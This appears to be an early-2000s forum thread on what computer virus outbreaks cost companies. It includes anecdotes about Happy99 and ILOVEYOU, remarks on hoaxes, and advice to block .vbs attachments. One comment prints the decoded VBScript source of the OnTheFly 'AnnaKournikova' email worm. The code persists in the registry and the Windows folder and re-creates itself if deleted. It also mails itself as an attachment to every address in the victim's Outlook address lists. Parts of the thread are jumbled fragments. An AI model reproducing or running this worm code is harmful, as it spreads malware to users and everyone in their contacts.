There are, of course, delays caused by all this activity. But if you look at the degree of variability in breaks, time in/out, fire drills, phone calls, meetings, etc, this "delay" is not significant in it's duration. It's a miniscule blip, made slightly larger by being all at once.
Finally, there's the cost of the tools and expertise needed to fix the problem. This is a one-off cost, but'll routinely appear EVERY time there's a virus problem. And since these skills (such as system security) apply elsewhere in the business, it's a bad mistake to place the total cost under this one label.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
Case in point, back during the Michelangelo fiasco in 1992, John McAfee claimed that "5 million computers were infected, which was nothing but hype on his part, especially as he later contradicted himself (on March 6th, 1992) by saing that only 10,000 machines had been hit.
</rant>
--
A few years ago, the company I work for was hit by Happy99. It was a stupid little virus that infected your Winsock32.dll and sent itself to everyone on emailed. It made a backup of your uninfected dll, kept a text file of every email address it had sent itself to and was generally a polite virus. The company only had about 15 workstations at the time and it was no trouble cleaning up. The real problem was that I had to call a few dozen clients and tell them that our stupid client service people had sent them a virus. We looked like complete idiots. It turns out that only a couple of the client folks were infected and I could talk them through a cleanup over the phone. But of course those clients had sent infected emails to a few of their clients. So even the clients we didn't infect knew we had screwed up and the ones we did infect were severely pissed. I don't think anyone dropped up that week, but when our contracts came up for renewal who knows if our virus problem had an influence. So the direct cost of the virus was only a couple hours of my time. The hit to our reputation may have cost us tens or hundreds of thousands of dollars.
-B
Viruses are probably even MORE costly. Consider:
- A virus comes in and trashes some files/configs, etc. Some people's work is lost forever and has to be redone. Those people lose days.
- The sysadmins take down the mail server and clean things out. The whole company's email is out of service for hours.
and so on.
Let's suppose it's a high-tek company on the rise. And lets suppose this delays its product introduction by one day.
Now consider the amount of money the company would make FOR THE REST OF TIME, if it hadn't been hit by the virus. Draw the graph of the amount it makes each day and color it in below the graph. That area is the amount of money it takes in.
Now draw the same graph for the company WITH the virus hit. Start by shifting the graph to the right by one day, then lower it to account for the competition beating it to market, irate customers, delayed customers not doing as well and not buying as much product, and so on. Put that graph over the first and erase everything it covers. What's left is a financial flow that the company DIDN'T get because of the virus.
Finally, compute how much money you'd have to put in an account at prevailing interest rates to be able to take out all that money at the time the graph shows it. THAT's the cost of the virus hit - on THAT COMPANY.
(If there are any places where the graph WITH the virus hit is higher than the one without, it represents a deposit rather than a withdrawal. The account should go to zero when the company without the hit folds.)
Of course predicting the actual cost means accurately predicting two futures and taking the difference. So coming up with a number is crystal-ball reading.
Computing the PROVABLE direct loss is another story entirely.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Virus myths: Ahh the good old days when the Good Times virus was clearly a hoax - unless you believed it in which case you would forward it around, fulfilling the prophecy!
Mmmm.. Donuts
I don't have costs on viruses out there> I thought it might be interesting looking at the source code of the OnTheFly virus, which was unleashed on us this morning. This is the code after the virus decodes it from a string
e r(0)& "\AnnaKournikova.jpg.vbs"
, True)
;o)"
<BLOCKQUOTE>
'Vbs.OnTheFly Created By OnTheFly
On Error Resume Next
Set E7O3tH65p4P = CreateObject("WScript.Shell")
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set rOwamTjngb5= Createobject("scripting.filesystemobject")
rOwamTjngb5.copyfile wscript.scriptfullname,rOwamTjngb5.GetSpecialFold
if E7O3tH65p4P.regread ("HKCU\software\OnTheFly\mailed") <> "1" then
e2nSA7HlgLC()
end if
if month(now) =1 and day(now) =26 then
E7O3tH65p4P.run "Http://www.dynabyte.nl",3,false
end if
Set JKgSwHK773x= rOwamTjngb5.opentextfile(wscript.scriptfullname, 1)
ZN5JKZ4xiuV= JKgSwHK773x.readall
JKgSwHK773x.Close
Do
If Not (rOwamTjngb5.fileexists(wscript.scriptfullname)) Then
Set UeI22z8P4v0= rOwamTjngb5.createtextfile(wscript.scriptfullname
UeI22z8P4v0.writeZN5JKZ4xiuV
UeI22z8P4v0.Close
End If
Loop
Function e2nSA7HlgLC()
On Error Resume Next
Set D23OvxM6KRH = CreateObject("Outlook.Application")
If D23OvxM6KRH= "Outlook"Then
Set j25tNZB9f8l=D23OvxM6KRH.GetNameSpace("MAPI")
Set S6k211ge33L= j25tNZB9f8l.AddressLists
For Each JR2mPsM2BmR In S6k211ge33L
If JR2mPsM2BmR.AddressEntries.Count <> 0 Then
d4BD3xgwv1J = JR2mPsM2BmR.AddressEntries.Count
For X789Va3zRez= 1 To d4BD3xgwv1J
Set iq72b483v3Z = D23OvxM6KRH.CreateItem(0)
Set OIE4BVYjOJ8 = JR2mPsM2BmR.AddressEntries(X789Va3zRez)
iq72b483v3Z.To = OIE4BVYjOJ8.Address
iq72b483v3Z.Subject = "Here you have,
iq72b483v3Z.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set fWsnq8YG9f1=iq72b483v3Z.Attachments
fWsnq8YG9f1.Add rOwamTjngb5.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"
iq72b483v3Z.DeleteAfterSubmit = True
If iq72b483v3Z.To <> "" Then
iq72b483v3Z.Send
E7O3tH65p4P.regwrite "HKCU\software\OnTheFly\mailed", "1"
End If
Next
End If
Next
end if
End Function
'Vbswg 1.50b
</BLOCKQUOTE>
It can cost a lot when a business gets hit hard by a virus..but it shouldn't.
.vbs virus is running around but we are protected. Why? Not because we run Linux (We do..just not most people), but because I block *ALL* .vbs attachments coming in our network. Easy to do..works damn well. I have 14 hits of this new virus in our log but none of my users are the wiser.
.vbs files TODAY, you need to be asking why not.
Take today for example..that big new scary
As for costs... I know when I Luv You hit many businesses were without email for DAYS. It took several admins hours and hours to clear out the systems, which costs a lot of money. Plus lost productivity from users. I don't think we'll get hit by another one like that again, hopefully admins learned their lesson.
If you're not blocking
Windows ME sells for 169.99 at Amazon.com
Je t'aime Stéphanie
As a sysadmin at a small-ish company, I get dozens of bogus virus warning e-mail messages per week. That's not the problem, though. It's when they pass the message on to the company at large because they don't think I'm taking it seriously enough. It's the "I've got a virus/get me a new computer" mentality when they've downloaded too much pr0n.
argh!